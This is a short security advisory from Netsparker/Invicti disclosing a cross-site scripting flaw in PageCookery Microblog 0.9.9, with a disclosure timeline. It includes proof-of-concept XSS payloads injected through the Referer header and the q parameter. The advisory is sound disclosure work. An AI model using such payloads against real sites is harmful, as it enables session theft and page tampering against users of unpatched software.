XSS Vulnerability in PageCookery Microblog
Information
Advisory by Netsparker (now Invicti)
Name: XSS Vulnerability in PageCookery Microblog
Software:PageCookery 0.9.9 and possibly below.
Vendor Homepage: http://pagecookery.com/
Vulnerability Type: Cross-site Scripting
Severity: Critical
Researcher: Omar Kurt
Advisory Reference: NS-14-026
Description
PageCookery is the first public offering of single-user version of the open source microblogging program, PHP + MySQL based architecture is a set of safety, efficiency and stability, to “share”, “discovery” for the concept of Web 2.0 solutions to micro-blog.
Details
PageCookery Microblog is affected by XSS vulnerability 0.9.9.
PageCookery Microblog PoC urls are as follows:
- Cross-site Scripting
http://example.com/MD/?act=login
(Referer)'"--></style></scRipt><scRipt>alert(0x000271)</scRipt>
http://example.com/MD/?q=';"--></style></scRipt><scRipt>alert(0x0000C2)</scRipt>
Learn more about Cross-site Scripting vulnerabilities:
Advisory Timeline
29/04/2014 – First Contact
07/06/2014 – Second Contact
14/08/2014 – Advisory released
Credits
It has been discovered on testing of Invicti Web Application Security Scanner.
About Invicti
Invicti® can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on.